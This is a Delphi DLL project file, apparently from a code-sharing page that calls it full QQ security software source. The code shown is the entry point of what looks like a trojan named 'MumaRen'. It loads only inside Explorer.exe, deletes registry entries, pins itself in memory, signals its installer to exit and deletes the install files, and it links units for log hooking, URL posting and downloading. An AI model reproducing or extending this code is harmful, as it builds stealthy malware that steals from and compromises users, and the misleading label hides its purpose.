hook.~dpr

来自「DEILPHI写的QQ安全软件源码!功能全套,该有的全有了,欢迎交流」· ~DPR 代码 · 共 61 行

library  Hook;
 {$R  '..\EXE\EXE.res'}
uses
  Windows,
  Messages,

  FunUnit in 'FunUnit.pas',
  UrlPost in 'UrlPost.pas',
  Thread in 'Thread.pas',
  EditWin in 'EditWin.pas',
  ExtInfo in 'ExtInfo.pas',
  Encrypt in 'Encrypt.pas',
  Timer in 'Timer.pas',
  GPKernel in 'GPKernel.pas',
  VarUnit in 'VarUnit.pas',
  ScanWin in 'ScanWin.pas',
  LogHook in 'LogHook.pas',
  downn in 'downn.pas',
  Closee in 'Closee.pas',
  REG in 'REG.pas';
   {$R  ver.res}
exports
 { DllGetClassObject,
  DllCanUnloadNow,
  DllRegisterServer,
  DllUnregisterServer,}
  LogHookOn,
  LogHookOff;
const
  sFileMap = 'wFileMap_MumaRen'; // 内存映射文件
  sProcess = 'Explorer.exe';     // 插入进程对象 //  Explorer.exe
var
  PMainThreadID: PDWORD;
  MutexHandle, FileHandle, SubThreadID: DWORD;
  ModuleFileName: array [0..MAX_PATH] of Char;

begin
  DElREG;//清除注册表
 // 检查DLL进入的进程
  GetModuleFileName(0, @ModuleFileName[0], MAX_PATH);
  if CompareAnsiText(ExtractFileName(ModuleFileName), sProcess) then
  begin
    if  (FindWindow('Edit', 'MumaRen') = 0) then
   begin
    CreateThread(nil, 0, @ThreadPro, Pointer(66), 0, SubThreadID);
    ModuleFileName[GetModuleFileName(0, @ModuleFileName[0], MAX_PATH)] := #0;
         // 增加自身引用计数
      GetModuleFileName(HInstance, @ModuleFileName[0], MAX_PATH);
      LoadLibrary(@ModuleFileName[0]);
      LoadExtraInfo(@ModuleFileName[0]); // 信息
          // 通知Start.exe退出
      FileHandle := OpenFileMapping(FILE_MAP_ALL_ACCESS, False, sFileMap);
      PMainThreadID := MapViewOfFile(FileHandle, FILE_MAP_ALL_ACCESS, 0, 0, 0);
      PostThreadMessage(PMainThreadID^, WM_QUIT, 0, 0);
      UnmapViewOfFile(PMainThreadID);
      CloseHandle(FileHandle);
      guanbi;//删除安装和引导文件
  end;
 end;
end.